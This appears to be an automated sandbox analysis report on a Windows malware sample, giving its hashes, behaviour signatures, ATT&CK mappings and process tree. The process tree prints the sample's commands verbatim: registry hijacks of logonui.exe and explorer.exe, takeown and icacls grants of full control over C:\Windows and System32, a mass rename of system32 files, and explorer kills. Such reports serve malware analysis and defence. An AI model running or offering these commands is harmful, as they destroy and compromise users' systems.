Overview

overview

8

Static

static

5

38674f024b...d6.exe

windows7_x64

8

38674f024b...d6.exe

windows10-2004_x64

8

Analysis

  • max time kernel
    169s
  • max time network
    50s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    11-05-2022 22:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    38674f024ba7dbc7cc7a461d1b60b948ee7abbd5e81d26f25f991373cf196ad6.exe

  • Size

    865KB

  • MD5

    a11969b7f736f7613b76a2def8c51dbc

  • SHA1

    fa055058e2c1db2fb83ec6b7da9f1c41648889e3

  • SHA256

    38674f024ba7dbc7cc7a461d1b60b948ee7abbd5e81d26f25f991373cf196ad6

  • SHA512

    9ff92c00a0a78786a2222082e3a3452f9d20249844b10cfc774849ad49e56904d9eddb0b3d3b25106bfe741d84fa685b16e15745ba304aaaeb02854bbe3705ec

Score
8/10
discoveryexploit

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
    exploit
  • Modifies file permissions 1 TTPs 4 IoCs
    discovery
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\38674f024ba7dbc7cc7a461d1b60b948ee7abbd5e81d26f25f991373cf196ad6.exe
    "C:\Users\Admin\AppData\Local\Temp\38674f024ba7dbc7cc7a461d1b60b948ee7abbd5e81d26f25f991373cf196ad6.exe"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:956
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\logonui.exe /v logon /t REG_SZ /d 'wscript.exe' /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1540
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\logonui.exe /v logon /t REG_SZ /d 'wscript.exe' /f
        3⤵
        • Modifies registry key
        PID:848
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe /v explorer /t REG_SZ /d 'wscript.exe' /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1568
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe /v explorer /t REG_SZ /d 'wscript.exe' /f
        3⤵
        • Modifies registry key
        PID:524
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c taskkill /f /im explorer.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1388
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im explorer.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1720
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c takeown /f C:\Windows\System32\
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1300
      • C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\System32\
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:704
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c icacls C:\Windows\System32 /Grant Users:F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1048
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\System32 /Grant Users:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1064
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c takeown /f C:\Windows\
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1676
      • C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:976
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c icacls C:\Windows\ /Grant Users:F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1504
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\ /Grant Users:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1112
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ren C:\Windows\system32\*.* *.lolxxd
      2⤵
        PID:1920
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c taskkill /f /im explorer.exe
        2⤵
          PID:1336
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im explorer.exe
            3⤵
            • Kills process with taskkill
            PID:1264

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      File Permissions Modification

      1
      T1222

      Modify Registry

      1
      T1112

      Credential Access

      Discovery

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/524-61-0x0000000000000000-mapping.dmp
        Download
      • memory/704-64-0x0000000000000000-mapping.dmp
        Download
      • memory/848-60-0x0000000000000000-mapping.dmp
        Download
      • memory/956-54-0x0000000076181000-0x0000000076183000-memory.dmp
        Filesize

        8KB

        Download
      • memory/976-66-0x0000000000000000-mapping.dmp
        Download
      • memory/1048-59-0x0000000000000000-mapping.dmp
        Download
      • memory/1064-67-0x0000000000000000-mapping.dmp
        Download
      • memory/1112-68-0x0000000000000000-mapping.dmp
        Download
      • memory/1264-71-0x0000000000000000-mapping.dmp
        Download
      • memory/1300-58-0x0000000000000000-mapping.dmp
        Download
      • memory/1336-70-0x0000000000000000-mapping.dmp
        Download
      • memory/1388-57-0x0000000000000000-mapping.dmp
        Download
      • memory/1504-63-0x0000000000000000-mapping.dmp
        Download
      • memory/1540-55-0x0000000000000000-mapping.dmp
        Download
      • memory/1568-56-0x0000000000000000-mapping.dmp
        Download
      • memory/1676-62-0x0000000000000000-mapping.dmp
        Download
      • memory/1720-65-0x0000000000000000-mapping.dmp
        Download
      • memory/1920-69-0x0000000000000000-mapping.dmp
        Download